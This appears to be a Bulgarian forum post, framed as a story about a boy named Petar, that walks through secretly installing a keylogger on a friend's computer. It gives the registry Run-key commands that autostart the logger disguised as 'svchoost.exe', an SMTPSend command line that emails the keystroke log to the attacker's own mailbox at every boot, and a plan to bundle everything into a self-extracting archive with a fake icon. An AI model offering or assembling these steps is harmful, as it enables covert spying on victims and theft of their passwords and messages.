Някой сега ще се очуди защо ли така е озаглавена темата, веднага одговарям
част 1.
Петърчо разбрал какво му направил другарчето и решил и той да се изхитри, но как ? той не знаел програмен език, но какво значение има това ако той възприема доста бързо и е доста хитър, а и нали и неговия чичо е доста умен и е винаги до него. Той подочул за програми който записват всички натиснати бутони Keylogger-и, започнал да събира матерял как да си направи, той знаел, че има готови но как да накара Иван да си го инсталира (просто е невъзможно). При търсенето си намирал много видове и си харесал един даже си имал и source 
, и взел, че се зарадвал и си казал готово! но след малко мислене стигнал до извода, че няма как да изкара този лог от компютъра на Иванчо и също така не знаел как да накара тази програма да се стартира автоматично и се стъжил (ей да не мислите, че разказа свършва до тук има още...) но защо нали казахме, че той възприема доста бързо. Започнал да пита чичо си за autostart методи той разбрал за регистрите въпевки че ималко много други раздели той си харесал един от тях.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Рещил че Keylogger-а ще се намира вув C:\WINDOWS\system32\key а името му ще е svchoost.exe след което направил следното. Отворил NOTEPAD вътре написал
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v startup /t REG_SZ /d C:\WINDOWS\system32\key\svchoost.exe
и го сейфал със разширение .bat (svchoost.bat) по този начин при стартирването на бата ще се постави ключ във регистрите който ще стартирва Keylogger-а така до тука ясно но как да изкара от там лога... пак чичото. Намерил една тема но за жалост човека не е обеснил много много... и той си изтеглил програмката 
smtpsend.zip потърсил още малко smtp send но за сега се спрял на предложената програма, оставало само настройването (това да го оставя ли на вас... някой няма да могат да се справят, продължавам) а за настройката му трябвал някой SMTP сърват а какво по лесно от това да се регистрира някъде където предлагат тази услуга, той решил да се регне във mail.ru след малко разъждения стигнал до тук.
SMTPSend -fapetyr@mail.ru -tapetyr@abv.bg -hsmtp.mail.ru - -lpparola -asmtpsend.TXT
и всичко това го сейфал във един бат (xx.bat)
fapetyr@mail.ru - ника във mail.ru
tapetyr@abv.bg - пощата където ще се изпраща лога
smtp.mail.ru - http://mail.ru/pages/help/79.html
lpparola - паролаза за mail.ru
asmtpsend.TXT - лога от кейлогера
след което пак се възползвал от начина на стартирване на програма и нагласил да се стартира при всяко включване на компютара следния скрипт (ако предположим че xx.bat се намира C:\WINDOWS\system32\key)
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v startup2 /t REG_SZ /d C:\WINDOWS\system32\key\xx.bat
по този начин smtpsend.ехе ще изпрати лога при всяко включване на компа.
готово за сега
Дааааа намери всичко Петър остана само да зглоби. Той знаел че WinRar-a имал възможност за SFX компресия при което може да се определи къде да се деархивира какво да се стартира... и разбирасе смяна на икона, за това потърсил още малко и се натъкна на една програма SFX Compiler събрал всичко във едно и......
П.С.
Темата е породена от тук не гарантирам за нищо, не отговарям за нищо!
Малко поредактирах....
Отговор
За печат
Коментар